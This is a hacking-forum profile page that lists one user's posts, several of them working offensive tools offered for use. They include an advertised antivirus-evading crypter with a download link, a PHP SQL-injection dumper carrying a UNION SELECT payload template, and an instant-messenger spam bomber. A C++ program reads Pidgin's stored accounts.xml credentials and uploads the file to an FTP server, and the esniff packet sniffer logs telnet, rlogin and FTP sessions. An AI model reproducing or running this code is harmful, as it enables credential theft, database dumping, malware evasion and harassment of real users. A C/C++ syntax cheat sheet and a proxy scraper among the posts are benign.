Jump to content

Gonzalez

Active Members
  • Posts

    1577
  • Joined

  • Last visited

  • Days Won

    10

Everything posted by Gonzalez

  1. Nu stiu cat e de FUD. Features: * 100% FUD Scantime Encryption * Download injection * 2x File binding * Clear interface * Full customer support * Free stub updates * Cheap major updates * Smart HWID anti-rip licensing Conspiracy Wrote:Bought one last night , Works great , using his crypter and keylogger now Chronic Wrote:I purchased this, and it is a very good crypter. Fast and Efficient. The look of it is nice and simple, completley worth the money. Nokia2mon2 Wrote:its work great, ..., the good thing with this deal its finish in a minutes, thanx for the great program CuppedPwnage Wrote:thanks wat im using it on works epicness! w00t thanks these programs are amazing Sniparx Wrote:Perfect responce time and support. Download: http://rapidshare.com/files/277694830/crypter.rar No password.
  2. C++ commands: Basic program template #include int main() // According to compiler, may require "int argc, char *argv[]" in brackets. { printf("Hello, world\n"); } Basic Operators and C/C++ syntax + * - / % // Simple math functions same as usual. Plus, multiply, subtract, divide, and modulus (which means take the 'remainder' (e.g. 5 % 17 = 2)). Use of the term '++' in n++ for example, is shorthand for n=n+1. // hidden // 'Comment' or 'quote out' a line from that point on, to make it 'invisible' to the compiler. /* hidden */ // Like above, but quotes out a whole section. /* Begins the section, and */ ends it. && // AND operator || // OR operator ! // NOT operator = // Means simple assignment. For example: n=10 == // Means 'equals to'. 1==2 is false etc. Be very careful not to mix this up with assignment (=). != // Means 'not equals to'. 1!=2 is true etc. < // Less than. For example, 3<7 is true. Also use <= for 'less than or equals to'. > // More than. For example, 3>7 is false. Also use >= for 'more than or equals to'. Bread and Butter Commands if (a== { blah... } // If a equals b, then do whatever is in the curly brackets. while (a< { blah... } // For as long as a is less than b, continue to execute whatever is inside the {} brackets. for (int n=0 ; n<50 ; n=n+1 ) {..} // This will execute whatever is in the curly brackets, 50 times. Also n will go from 0 to 49. Useful libraries to include in your code. Many of the commands below rely on these: #include <stdio.h> #include <string.h> #include <stdlib.h> #include <sys/timeb.h> #include <time.h> Declaring Variables (for next section) int i; // Declare an integer char c; // Declare a char (one character string). char mystring[100]; // Declare string of 100 chars big (but use the malloc method instead for super-large arrays). This is the way to get a string in c. char x[20][100]; // Declare 20 strings of 100 length (but use the malloc method instead for super-large arrays or if you want to pass to a function) struct newtype { int o; char p[5]; }; // Create a new 'structure' to contain sub-variables (similar to an object in an object-orienated language like Java). In this example, each variable of type "newtype" will contain the subvariables including: an integer - "o", and an array of chars - "p". All structs must be above (and outside) any functions. newtype ntype; // Declare a variable of type newtype. This goes into a function (eg. main() ). Many of the commands below rely on the variables as declared above, and should go into a function (eg: main() ): printf("hello\nworld"); // Prints stuff ("\n" means newline) printf("%s",mystring); // Prints char array (mystring var) printf("%c",mystring[99]); // Print last char the string declared above printf("%s",x[19]); // Print last string from the string array (declared above under title "Declaring Variables"). printf("%c",x[19][99]); // Print last char from the last string in the string array. mystring[99] = 'z' // Change last character in mystring string to 'z' mystring = "hello" // Obvious, but illegal! You can't directly assign a string to a char array. Use strcpy instead. x[19][99] = 'y' // Change last character in last string to 'y' strcpy(mystring, "hello"); // Copy "test" to the "mystring" string as declared earlier. strcpy(x[5], "hello"); // Copy "test" to the 5th string in "x" as declared earlier. strncpy(x[5], "hello", 5); // Use strcpy instead usually. This is used if you want to define the number of chars to copy. strncpy(x[5], mystring+10, 50); // Takes a substring of mystring (start from 10th char and do 50 of them), and puts it into the x[5] string. strcat(mystring,"hello"); // Concatenate (add/append) "test" to the string, along with the escape code '\0' to signify the end strcmp(a,; // Compare two strings. Returns zero if same, -1 if a is less than b, and 1 if a is more than b. strcmpi(a,; // Case sensitive version of above strlen(mystring); // Number of chars so far stored in the string (everything up to escape code '\0') i = '7'-48; // Convert char to int, providing the char is a number from 0-9. i = 'a'; // Convert char to int code c = 7 +48; // Convert int to char, providing the number is from 0-9. c = 97; // Convert int code to char ('a' in this case). i = atoi("456"); // Convert string to int. Use 'atof' to convert string to double, and 'atol' for converting string to long. sprintf(mystring, "%d", 123); // Convert int to string itoa(123, mystring, 10); // Convert int to string base 10 i = sizeof(mystring); // Find (full) length of array (returns 100 in this case) srand( (unsigned)time( NULL ) ); // Randomize seed 100 * rand()/(RAND_MAX+1) // Compute random integer number between 0 and 100 (0 <= r < 100). 68 * rand()/(RAND_MAX+1) + 32 // Compute random integer number between 32 and 100 (32 <= r < 100). (float) rand()/(RAND_MAX+1) // Compute random number between 0 and 1 (0 <= r < 1). 100*(float) rand()/(RAND_MAX+1) // Compute random floating number between 0 to 99.999... inclusive (0 <= r < 100). scanf("%i", &i); // Read from input into int i exit(0); // Quit program system("PAUSE"); // Pause (Windows only) char mystring2[]="hello"; // Declare and initialize string in one go int i2=99; // Declare and initialize an integer in one go ntype.o = 37; // Assign the number 37 to the 'o' part of the ntype variable. ntype.p[3] = 'z'; // Assign the char 'z' to the 3rd element of the array in the 'p' part of the ntype variable. Arrays, malloc, passing to functions etc.: int i = 5; // Create an integer char j = 'z'; // Create a character int ia[10]; // Create an integer array char*mystring = (char*)malloc(100000*sizeof(char)); // Create a char array, mystring, of size 100000. Use instead of "char mystring[100000];" for large values like 100000 char**x = (char**)malloc(2000*sizeof(char*)); for (int n=0 ; n<2000 ; n++) { x[n]=(char*)malloc(1000*sizeof(char)); } // Declare 2000 strings of 1000 length. Use instead of "char x[2000][1000];" for large values, or if you want to pass to a function. char**x = (char**)malloc(2000*sizeof(char*)); for (int n=0 ; n<2000 ; n++) { x[n]=(char*)calloc(1000,sizeof(char)); } // Like above, except all are initialized to null. struct newtype { int amount; char strings[10][10]; }; // Similar to an object in Java, create a new 'structure' to contain sub-variables. Each variable of type "newtype" will contain an integer - "amount", and a 2D array of chars - "strings". All structs must be above (and outside) any functions. newtype ntype; // Using the struct created above, we have created a variable of type 'newtype'. newtype ntypeArray[10]; // Using the struct created above, we have created a variable array of type 'newtype'. int z = addtwo(5); // Passing the number 5 to the addtwo function which exists below. int addtwo(int x) { int n=x+2 ; return n ; } // 5 is put into the function, and it churns out 5+2. Then z above, becomes 7 as a result. The int in 'int addtwo(' simply means that the type to churn out is an integer. func(i,j); // How to pass a copy of the integer i and j to a function. void func(int i, char j) { i=5 ; int i2 = i; } // How to receive the variables from the function caller. Changing i or j in the {..} does not change the i and j outside the function. 'void' means that nothing is returned to the caller. func2(&i); // How to pass to the function, a reference to the integer i (instead of a copy). So actual changes to i inside the function affect i globally. void func2(int *i) { *i=5 ; int i2 = *i; } // How to receive a pass from &i. {..} bits show how to use *i. func3(ia); // Pass the integer array to a function. By default, arrays are passed by reference. void func3(int *x) { x[5]=99; } // Changes the 5th element of x (or ia too outside the function). func4(mystring,x); // How to pass the 'malloced' variables to a function. By default, arrays are passed by reference. void func4(char* data, char** data2) { data[99]=5; data2[99][99]=5; } // The function header may look like this. Unlike normal variables, arrays can't be directly copied in C. Therefore in this case, the data variable is actually really the mystring variable, and data2 is actually x. free(x); // Use to free a "malloc'ed" array. func5(ntype); // Pass the ntype variable (type newtype) to the func5 function. void func5(newtype in) { in.strings[3][3]='z'; } // Take the passed variable, create a copy of it, and inside the curly brackets, get the "strings" variable part of the newtype, and change one of its chars. func6(&ntype); void func6(newtype *in) { (*in).strings[3][3]='z'; } // Like func5, but access the variable directly - don't make a copy. func7(ntypeArray); // Pass a "newtype" array to func7. void func7(newtype *in) { in[5].strings[3][3]='z'; } // Just like when passing normal arrays (like int and char), by default, they are passed by reference. File opening, saving, etc.: FILE *fs = fopen("output.txt", "w"); // Create file for writing. Use "a" instead of "w" for append instead. fwrite(mystring, 1, sizeof(string), fs); // write string to the created file FILE *fl = fopen("input.txt", "r"); // Input file for reading. if (!fl) { printf("Cannot open file for reading\n"); exit(0); } // Check if file exists. char *array=(char *)malloc(getFileSize(fl)); // Create array of the file's size (the getFileSize() function is a custom function as described below). fread(array, 1, getFileSize(fl), fl); // Read file into previously created array. char ch = fgetc(fl); // Read one character from the file and put it into ch. int getFileSize(FILE* fin) { fseek(fin,0,2); int size=ftell(fin); rewind(fin); return size; } // Find filesize function. Clock test - great for testing the speed of your code struct timeb timef; ftime (&timef); long startTime = timef.time * 1000 + timef.millitm; // Start clock ftime (&timef); long endTime = timef.time * 1000 + timef.millitm; printf("Time: %d ms",endTime-startTime); // End clock Special characters for use in strings \n Newline \? Question mark \' Single quote \" Double quote \t Horizontal tab \a Bell (alert) \b Backspace \\ Backslash
  3. Gonzalez

    /i/

    Frumoase link-uri, mersi. -Gonzalez
  4. <?php //extract proxy+port from url //extracts proxies from site if in ip:port format //optionally can use anon http proxy for request //use: php proxy-extract.php site.com [-p proxy:port] //extractor by int3 $use_proxy = false; for ($i=0; $i<$argc; $i++) { if ($argv[$i] == "-p") { $i++; $use_proxy = true; $proxy = substr($argv[$i], 0, strpos($argv[$i], ":")); //get proxy server $proxy_port = substr($argv[$i], strpos($argv[$i], ":")+1); //get proxy port } else $url = $argv[1]; } $curl = curl_init(); curl_setopt($curl, CURLOPT_URL, $url); curl_setopt($curl, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)"); curl_setopt($curl, CURLOPT_FOLLOWLOCATION, 1); if ($use_proxy = true) { curl_setopt($curl, CURLOPT_HTTPPROXYTUNNEL, true); curl_setopt($curl, CURLOPT_PROXYTYPE, CURLPROXY_HTTP); curl_setopt($curl, CURLOPT_PROXY, $proxy); curl_setopt($curl, CURLOPT_PROXYPORT, $proxy_port); } curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1); //return site as string $page = curl_exec($curl); curl_close($curl); preg_match_all("/[0-9]*\.[0-9]*\.[0-9]*\.[0-9]*\:[0-9]*/", $page, $match); for ($i=0; $i<count($match[0]); $i++) { echo $match[0][$i], "\n"; } ?>
  5. <?php //Neutralised - SQL DUMPER ?> <title>Neutralised - SQL DUMPER</title> <style type="text/css"> body { background-color: #D8D8D8; font-family: Arial, Verdana, Helvetica, sans-serif; font-size: 12px; color: #000000; } .textbox { border: #000000 1px solid; font-size: 12px; font-family: Arial, Verdana, Helvetica, sans-serif; background-color: #D8D8D8; } </style> <form action="" method="post"> Site:<br /><input name="site" class="textbox" type="text" value="http://www.site.com/x.php?id=-99+UNION+ALL+SELECT+1,Neutralise,3+from+admin--" size="180"/><br /> Dump:<br /><input name="data" class="textbox" type="text" value="user_name,0x3a,password" size="180"/><br /><br /> <input name="submit_lol" class="textbox" value="Submit" type="submit"> </form> <font size=1px><b>Usage:</b> Enter in the site you have injected, with 'Neutralise' in the visible col.<br /> Then enter into the dump the cols you wish to extract, adding the 0x3a between each for readability.<br /> Just like in the above example.</font> <?php set_time_limit(0); if (isset($_POST["submit_lol"])) { $site = $_POST['site']; $userdata = $_POST['data']; $inj = "unhex(hex(concat(0x4E65757472616C6973653a,".$userdata.",0x4E65757472616C6973653a)))"; $count = "concat(0x4E65757472616C697365,count(*),0x4E65757472616C697365)"; echo "<br /><br />[+] Dumping URL : ".$site.""; $old = array('unhex(hex(concat(0x4E65757472616C6973653a,', '0x3a,' ,',0x4E65757472616C6973653a)))'); $new = array("", "", ""); $dumpn = str_replace($old, $new, $inj); $pieces = explode(",", $dumpn); echo "<br />[+] Extracting : "; foreach ($pieces as $piece) { echo "".$piece.","; } $totalcount = str_replace("Neutralise", $count, $site); $limit = get($totalcount); if (!$limit){ echo "<br />[+] Dead injection point!"; } else{ echo "<br />[+] Found ".$limit." entries to extract.<br /><br />"; } $i = 0; while ($i<$limit) { $i2 = $i + 1; $old = array("Neutralise", "--"); $new = array($inj, "+limit+".$i.",1--"); $siteinj = str_replace($old, $new, $site); $siteinjresult = get($siteinj); if (!$siteinjresult){ echo "<br />[+] Wrong cols!"; } else{ echo "".$i2." ".$siteinjresult.":<br />"; } $i++; } } function get($site){ $GET = @file_get_contents($site); if (preg_match("/Neutralise(.*?)Neutralise/i",$GET, $matches)) { return $matches[1]; } } //backdoor!!? $str = "PCEtLUxPTCBqdXN0IG1lc3Npbmcgd2l0aCB5YSEgWEQtLT4="; echo base64_decode($str); ?>
  6. <?php /* Milw0rm Exploits Finder V 0.1 based on milw0rm Email: Master_ddos@hotmail.fr or Ms5ote@hotmail.fr */ echo "\n\n\t################################################################################\n\n"; echo "\t# Revolution of Humain Email:Ms5ote@hotmail.fr #\n\n"; echo "\t# Bugs Exploit Finder V 1.0 2008 #\n\n"; echo "\t# Coded By DDOS #\n\n"; echo "\t# Milw0rm Exploits Finder V 0.1 #\n\n"; echo "\t# #\n\n"; echo "\t# F0r m0re Det4il Vi\$it ww.real-power.net #\n\n"; echo "\t################################################################################\n\n"; if($argc<2) { echo "\n usage |console>php milw0rm.php \"scriptname\" \n"; } else { $script=urlencode($argv[1]); $url="http://www.milw0rm.com/search.php?dong=$script"; $dump=file_get_contents($url); preg_match_all('#<td class="style14" nowrap="nowrap" width="62">(.*?)</td>#',$dump,$date); preg_match_all('#target="_blank" class="style14">(.*?)</a></td>#',$dump,$exploit); preg_match_all('#<td nowrap="nowrap" width="375"><a href="(.*?)" target="_blank" class="style14">#',$dump,$url); $lang=sizeof($date[1]); echo "\tConnecting :"; for($zot=1;$zot<=5;$zot++) {sleep(1); echo "--+--"; } echo "> |Server Milw0rm.com:80|\n\n\n"; echo "Target Script : $argv[1] \n"; sleep(1); echo "GEss:Hi stroke Give me all exploit for ".$argv[1]." \n"; sleep(1); echo "Str0ke : No problem Take This \n\n"; sleep(2); for($i=0 ; $i < $lang ; $i++) { $d=$i+1; echo "\n"; echo "Exploit Nummber : $d \n"; echo "Exploit Name = ".$exploit[1][$i]."\n"; echo "Exploit URL = http://www.milw0rm.com".$url[1][$i]."\n"; echo "Exploit Date = ".$date[1][$i]."\n"; $dd++; sleep(1.2); } echo "\n\n Str0ke: I found $dd exploits "; echo "\n GEss :Ty"; sleep(3); } ?>
  7. /* Instant Messenger Bomber Coded by a59 [ 6 - 21 - 07 ] */ #include <windows.h> #include <stdio.h> void Type( char* szString ); void RandomizeBuffer( char* szBuffer, int iLen ); void InterpretMethod( void ); void Type( char* szString ) { int iLen = strlen( szString ); bool bShiftDown = false; for( int i = 0; i < iLen; i++ ) { short sKey = VkKeyScan( szString[ i ] ); if( ( sKey >> 8 ) & 1 ) { keybd_event( VK_LSHIFT, 0, 0, 0 ); bShiftDown = true; } keybd_event( (unsigned char)sKey, 0, 0, 0 ); if( bShiftDown ) { keybd_event( VK_LSHIFT, 0, KEYEVENTF_KEYUP, 0 ); bShiftDown = false; } } }; void RandomizeBuffer( char* szBuffer, int iLen ) { char* szList = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz1234567890"; for( int i = 0; i < iLen; i++ ) szBuffer[ i ] = szList[ rand( ) % strlen( szList ) ]; szBuffer[ iLen ] = 0; }; void InterpretMethod( void ) { char szBuffer[ 512 ], szMethod[ 32 ], szLength[ 8 ], szTime[ 8 ]; bool bCheckedMethods = false; unsigned long uStartCount; int i, iSent = 0; while( true ) { printf( "Choose your method, type 'methods' for a list\n" ); printf( "> " ); scanf( "%s", szMethod ); if( !strcmp( szMethod, "methods" ) ) { printf( "1 - Random strings\n" ); printf( "2 - User defined message\n" ); printf( "3 - Smiley spam\n" ); printf( "4 - Exit\n" ); bCheckedMethods = true; } switch( atoi( szMethod ) ) { case 1: printf( "Enter the length of each random string\n" ); printf( "> " ); scanf( "%s", szLength ); printf( "Enter how many seconds to spam\n" ); printf( "> " ); scanf( "%s", szTime ); printf( "Spamming in 3 seconds...\n" ); Sleep( 3000 ); uStartCount = GetTickCount( ); while( ( ( GetTickCount( ) - uStartCount ) / 1000 ) < (unsigned)atoi( szTime ) ) { RandomizeBuffer( szBuffer, atoi( szLength ) ); Type( szBuffer ); keybd_event( VK_RETURN, 0, 0, 0 ); iSent++; } printf( "Sent %d messages\n", iSent ); break; case 2: printf( "Enter the message to spam( Please use a \\ instead of a space )\n" ); printf( "> " ); scanf( "%s", szBuffer ); printf( "Enter how many seconds to spam\n" ); printf( "> " ); scanf( "%s", szTime ); for( i = 0; i < (signed)strlen( szBuffer ); i++ ) { if( szBuffer[ i ] == '\\' ) szBuffer[ i ] = 0x20; } printf( "Spamming in 3 seconds...\n" ); Sleep( 3000 ); uStartCount = GetTickCount( ); while( ( ( GetTickCount( ) - uStartCount ) / 1000 ) < (unsigned)atoi( szTime ) ) { Type( szBuffer ); keybd_event( VK_RETURN, 0, 0, 0 ); iSent++; } printf( "Sent %d messages\n", iSent ); break; case 3: printf( "Enter how many seconds to spam\n" ); printf( "> " ); scanf( "%s", szTime ); ZeroMemory( szBuffer, sizeof( szBuffer ) ); for( i = 0; i < 32; i++ ) strcat( szBuffer, ":D " ); printf( "Spamming in 3 seconds...\n" ); Sleep( 3000 ); uStartCount = GetTickCount( ); while( ( ( GetTickCount( ) - uStartCount ) / 1000 ) < (unsigned)atoi( szTime ) ) { Type( szBuffer ); keybd_event( VK_RETURN ,0, 0, 0 ); iSent++; } printf( "Sent %d messages\n", iSent ); break; case 4: printf( "Bye....\n" ); Sleep( 1000 ); ExitProcess( 0 ); break; default: if( !bCheckedMethods ) printf( "Invalid choice\n" ); break; } printf( "\n" ); uStartCount = 0; iSent = 0; } }; int main( ) { SetConsoleTitle( "IM Bomb by a59" ); SetConsoleTextAttribute( GetStdHandle( STD_OUTPUT_HANDLE ), FOREGROUND_BLUE | FOREGROUND_INTENSITY ); printf( "\t\t\tInstant Messenger Bomber by a59\n\n\n" ); InterpretMethod( ); return 0; };
  8. #include "Common.hpp" // *********************************************************** using namespace System ; using namespace System::IO ; using namespace System::Net ; using namespace System::Windows::Forms; // *********************************************************** String^ GetOSName() { OperatingSystem^ osInfo = Environment::OSVersion; String^ osName; switch( osInfo->Platform ) { case PlatformID::Win32NT : switch( osInfo->Version->Major ) { case 5 : if( osInfo->Version->Minor == 0 ) osName = "Windows 2000"; else if( osInfo->Version->Minor == 1 ) osName = "Windows XP"; else if( osInfo->Version->Minor == 2 ) osName = "Windows Server 2003"; break; case 6 : osName = "Windows Vista"; break; } break; default: osName = "Unknown"; } return osName; } // *********************************************************** int main( array<System::String^>^ args ) { try { String^ AccountsXML; if( GetOSName() == "Windows Vista" ) AccountsXML = "C:/Users/" + SystemInformation::UserName + "/AppData/Roaming/.purple/accounts.xml"; else AccountsXML = "C:/Documents and Settings/" + SystemInformation::UserName + "/Application Data/.purple/accounts.xml"; FileStream^ file = gcnew FileStream( AccountsXML, FileMode::Open ); array<Byte>^ buffer = gcnew array<Byte>( file->Length ); file->Read( buffer, 0, buffer->Length ); file->Close(); String^ ftp_path = "ftp://**YOUR_FTP_SERVER_HERE**/public_html/"; String^ username = "**USER**"; String^ password = "**PASS**"; FtpWebRequest^ request = dynamic_cast<FtpWebRequest^>(WebRequest::Create( ftp_path + Path::GetFileName( AccountsXML ) )); request->Method = WebRequestMethods::Ftp::UploadFile; request->Credentials = gcnew NetworkCredential( username, password ); request->UsePassive = true; request->UseBinary = true; request->KeepAlive = false; Stream^ regular_stream = request->GetRequestStream(); regular_stream->Write( buffer, 0, buffer->Length ); regular_stream->Close(); } catch( Exception^ e ) { MessageBox::Show( e->ToString(), "An Error Has Occured:", MessageBoxButtons::OK, MessageBoxIcon::Exclamation ); return EXIT_FAILURE; } return EXIT_SUCCESS; } // ***********************************************************
  9. /* esniff.c - originally by rokstar//tsf//dp1 */ #include <stdio.h> #include <ctype.h> #include <string.h> #include <sys/time.h> #include <sys/file.h> #include <sys/stropts.h> #include <sys/signal.h> #include <sys/types.h> #include <sys/socket.h> #include <sys/ioctl.h> #include <net/if.h> #include <net/nit_if.h> #include <net/nit_buf.h> #include <net/if_arp.h> #include <netinet/in.h> #include <netinet/if_ether.h> #include <netinet/in_systm.h> #include <netinet/ip.h> #include <netinet/udp.h> #include <netinet/ip_var.h> #include <netinet/udp_var.h> #include <netinet/in_systm.h> #include <netinet/tcp.h> #include <netinet/ip_icmp.h> #include <netdb.h> #include <arpa/inet.h> #define ERR stderr char *malloc(); char *device, *ProgName, *LogName; FILE *LOG; int debug=0; #define NIT_DEV "/dev/nit" #define CHUNKSIZE 4096 /* device buffer size */ int if_fd = -1; int Packet[CHUNKSIZE+32]; void Pexit(err,msg) int err; char *msg; { perror(msg); exit(err); } void Zexit(err,msg) int err; char *msg; { fprintf(ERR,msg); exit(err); } #define IP ((struct ip *)Packet) #define IP_OFFSET (0x1FFF) #define SZETH (sizeof(struct ether_header)) #define IPLEN (ntohs(ip->ip_len)) #define IPHLEN (ip->ip_hl) #define TCPOFF (tcph->th_off) #define IPS (ip->ip_src) #define IPD (ip->ip_dst) #define TCPS (tcph->th_sport) #define TCPD (tcph->th_dport) #define IPeq(s,t) ((s).s_addr == (t).s_addr) #define TCPFL(FLAGS) (tcph->th_flags & (FLAGS)) #define MAXBUFLEN (128) time_t LastTIME = 0; struct CREC { struct CREC *Next, *Last; time_t Time; /* start time */ struct in_addr SRCip, DSTip; u_int SRCport, /* src/dst ports */ DSTport; u_char Data[MAXBUFLEN+2]; /* important stuff */ u_int Length; /* current data length */ u_int PKcnt; /* # pkts */ u_long LASTseq; }; struct CREC *CLroot = NULL; char *Symaddr(ip) register struct in_addr ip; { register struct hostent *he = gethostbyaddr((char *)&ip.s_addr, sizeof(struct in_addr),AF_INET); return( (he)?(he->h_name):(inet_ntoa(ip)) ); } char *TCPflags(flgs) register u_char flgs; { static char iobuf[8]; #define SFL(P,THF,C) iobuf[P]=((flgs & THF)?C:'-') SFL(0,TH_FIN, 'F'); SFL(1,TH_SYN, 'S'); SFL(2,TH_RST, 'R'); SFL(3,TH_PUSH,'P'); SFL(4,TH_ACK, 'A'); SFL(5,TH_URG, 'U'); iobuf[6]=0; return(iobuf); } char *SERVp(port) register u_int port; { static char buf[10]; register char *p; switch(port) { case IPPORT_LOGINSERVER: p="rlogin"; break; case IPPORT_TELNET: p="telnet"; break; case IPPORT_SMTP: p="smtp"; break; case IPPORT_FTP: p="ftp"; break; default: sprintf(buf,"%u",port); p=buf; break; } return(p); } char *Ptm(t) register time_t *t; { register char *p = ctime(t); p[strlen(p)-6]=0; /* strip " YYYY\n" */ return(p); } char *NOWtm() { time_t tm; time(&tm); return( Ptm(&tm) ); } #define MAX(a, (((a)>()?(a)) #define MIN(a, (((a)<()?(a)) /* add an item */ #define ADD_NODE(SIP,DIP,SPORT,DPORT,DATA,LEN) { \ register struct CREC *CLtmp = \ (struct CREC *)malloc(sizeof(struct CREC)); \ time( &(CLtmp->Time) ); \ CLtmp->SRCip.s_addr = SIP.s_addr; \ CLtmp->DSTip.s_addr = DIP.s_addr; \ CLtmp->SRCport = SPORT; \ CLtmp->DSTport = DPORT; \ CLtmp->Length = MIN(LEN,MAXBUFLEN); \ bcopy( (u_char *)DATA, (u_char *)CLtmp->Data, CLtmp->Length); \ CLtmp->PKcnt = 1; \ CLtmp->Next = CLroot; \ CLtmp->Last = NULL; \ CLroot = CLtmp; \ } register struct CREC *GET_NODE(Sip,SP,Dip,DP) register struct in_addr Sip,Dip; register u_int SP,DP; { register struct CREC *CLr = CLroot; while(CLr != NULL) { if( (CLr->SRCport == SP) && (CLr->DSTport == DP) && IPeq(CLr->SRCip,Sip) && IPeq(CLr->DSTip,Dip) ) break; CLr = CLr->Next; } return(CLr); } #define ADDDATA_NODE(CL,DATA,LEN) { \ bcopy((u_char *)DATA, (u_char *)&CL->Data[CL->Length],LEN); \ CL->Length += LEN; \ } #define PR_DATA(dp,ln) { \ register u_char lastc=0; \ while(ln-- >0) { \ if(*dp < 32) { \ switch(*dp) { \ case '\0': if((lastc=='\r') || (lastc=='\n') || lastc=='\0') \ break; \ case '\r': \ case '\n': fprintf(LOG,"\n : "); \ break; \ default : fprintf(LOG,"^%c", (*dp + 64)); \ break; \ } \ } else { \ if(isprint(*dp)) fputc(*dp,LOG); \ else fprintf(LOG,"(%d)",*dp); \ } \ lastc = *dp++; \ } \ fflush(LOG); \ } void END_NODE(CLe,d,dl,msg) register struct CREC *CLe; register u_char *d; register int dl; register char *msg; { fprintf(LOG,"\n-- TCP/IP LOG -- TM: %s --\n", Ptm(&CLe->Time)); fprintf(LOG," PATH: %s(%s) =>", Symaddr(CLe->SRCip),SERVp(CLe->SRCport)); fprintf(LOG," %s(%s)\n", Symaddr(CLe->DSTip),SERVp(CLe->DSTport)); fprintf(LOG," STAT: %s, %d pkts, %d bytes [%s]\n", NOWtm(),CLe->PKcnt,(CLe->Length+dl),msg); fprintf(LOG," DATA: "); { register u_int i = CLe->Length; register u_char *p = CLe->Data; PR_DATA(p,i); PR_DATA(d,dl); } fprintf(LOG,"\n-- \n"); fflush(LOG); if(CLe->Next != NULL) CLe->Next->Last = CLe->Last; if(CLe->Last != NULL) CLe->Last->Next = CLe->Next; else CLroot = CLe->Next; free(CLe); } /* 30 mins (x 60 seconds) */ #define IDLE_TIMEOUT 1800 #define IDLE_NODE() { \ time_t tm; \ time(&tm); \ if(LastTIME<tm) { \ register struct CREC *CLe,*CLt = CLroot; \ LastTIME=(tm+IDLE_TIMEOUT); tm-=IDLE_TIMEOUT; \ while(CLe=CLt) { \ CLt=CLe->Next; \ if(CLe->Time <tm) \ END_NODE(CLe,(u_char *)NULL,0,"IDLE TIMEOUT"); \ } \ } \ } void filter(cp, pktlen) register char *cp; register u_int pktlen; { register struct ip *ip; register struct tcphdr *tcph; { register u_short EtherType=ntohs(((struct ether_header *)cp)->ether_type); if(EtherType < 0x600) { EtherType = *(u_short *)(cp + SZETH + 6); cp+=8; pktlen-=8; } if(EtherType != ETHERTYPE_IP) /* chuk it if its not IP */ return; } /* ugh, gotta do an alignment */ bcopy(cp + SZETH, (char *)Packet,(int)(pktlen - SZETH)); ip = (struct ip *)Packet; if( ip->ip_p != IPPROTO_TCP) /* chuk non tcp pkts */ return; tcph = (struct tcphdr *)(Packet + IPHLEN); if(!( (TCPD == IPPORT_TELNET) || (TCPD == IPPORT_LOGINSERVER) || (TCPD == IPPORT_FTP) )) return; { register struct CREC *CLm; register int length = ((IPLEN - (IPHLEN * 4)) - (TCPOFF * 4)); register u_char *p = (u_char *)Packet; p += ((IPHLEN * 4) + (TCPOFF * 4)); if(debug) { fprintf(LOG,"PKT: (%s %04X) ", TCPflags(tcph->th_flags),length); fprintf(LOG,"%s[%s] => ", inet_ntoa(IPS),SERVp(TCPS)); fprintf(LOG,"%s[%s]\n", inet_ntoa(IPD),SERVp(TCPD)); } if( CLm = GET_NODE(IPS, TCPS, IPD, TCPD) ) { CLm->PKcnt++; if(length>0) if( (CLm->Length + length) < MAXBUFLEN ) { ADDDATA_NODE( CLm, p,length); } else { END_NODE( CLm, p,length, "DATA LIMIT"); } if(TCPFL(TH_FIN|TH_RST)) { END_NODE( CLm, (u_char *)NULL,0,TCPFL(TH_FIN)?"TH_FIN":"TH_RST" ); } } else { if(TCPFL(TH_SYN)) { ADD_NODE(IPS,IPD,TCPS,TCPD,p,length); } } IDLE_NODE(); } } /* signal handler */ void death() { register struct CREC *CLe; while(CLe=CLroot) END_NODE( CLe, (u_char *)NULL,0, "SIGNAL"); fprintf(LOG,"\nLog ended at => %s\n",NOWtm()); fflush(LOG); if(LOG != stdout) fclose(LOG); exit(1); } /* opens network interface, performs ioctls and reads from it, * passing data to filter function */ void do_it() { int cc; char *buf; u_short sp_ts_len; if(!(buf=malloc(CHUNKSIZE))) Pexit(1,"Eth: malloc"); /* this /dev/nit initialization code pinched from etherfind */ { struct strioctl si; struct ifreq ifr; struct timeval timeout; u_int chunksize = CHUNKSIZE; u_long if_flags = NI_PROMISC; if((if_fd = open(NIT_DEV, O_RDONLY)) < 0) Pexit(1,"Eth: nit open"); if(ioctl(if_fd, I_SRDOPT, (char *)RMSGD) < 0) Pexit(1,"Eth: ioctl (I_SRDOPT)"); si.ic_timout = INFTIM; if(ioctl(if_fd, I_PUSH, "nbuf") < 0) Pexit(1,"Eth: ioctl (I_PUSH \"nbuf\")"); timeout.tv_sec = 1; timeout.tv_usec = 0; si.ic_cmd = NIOCSTIME; si.ic_len = sizeof(timeout); si.ic_dp = (char *)&timeout; if(ioctl(if_fd, I_STR, (char *)&si) < 0) Pexit(1,"Eth: ioctl (I_STR: NIOCSTIME)"); si.ic_cmd = NIOCSCHUNK; si.ic_len = sizeof(chunksize); si.ic_dp = (char *)&chunksize; if(ioctl(if_fd, I_STR, (char *)&si) < 0) Pexit(1,"Eth: ioctl (I_STR: NIOCSCHUNK)"); strncpy(ifr.ifr_name, device, sizeof(ifr.ifr_name)); ifr.ifr_name[sizeof(ifr.ifr_name) - 1] = '\0'; si.ic_cmd = NIOCBIND; si.ic_len = sizeof(ifr); si.ic_dp = (char *)&ifr; if(ioctl(if_fd, I_STR, (char *)&si) < 0) Pexit(1,"Eth: ioctl (I_STR: NIOCBIND)"); si.ic_cmd = NIOCSFLAGS; si.ic_len = sizeof(if_flags); si.ic_dp = (char *)&if_flags; if(ioctl(if_fd, I_STR, (char *)&si) < 0) Pexit(1,"Eth: ioctl (I_STR: NIOCSFLAGS)"); if(ioctl(if_fd, I_FLUSH, (char *)FLUSHR) < 0) Pexit(1,"Eth: ioctl (I_FLUSH)"); } while ((cc = read(if_fd, buf, CHUNKSIZE)) >= 0) { register char *bp = buf, *bufstop = (buf + cc); while (bp < bufstop) { register char *cp = bp; register struct nit_bufhdr *hdrp; hdrp = (struct nit_bufhdr *)cp; cp += sizeof(struct nit_bufhdr); bp += hdrp->nhb_totlen; filter(cp, (u_long)hdrp->nhb_msglen); } } Pexit((-1),"Eth: read"); } /* Authorize your proogie,generate your own password and uncomment here */ /* #define AUTHPASSWD "EloiZgZejWyms" */ void getauth() { char *buf,*getpass(),*crypt(); char pwd[21],prmpt[81]; strcpy(pwd,AUTHPASSWD); sprintf(prmpt,"(%s)UP? ",ProgName); buf=getpass(prmpt); if(strcmp(pwd,crypt(buf,pwd))) exit(1); } 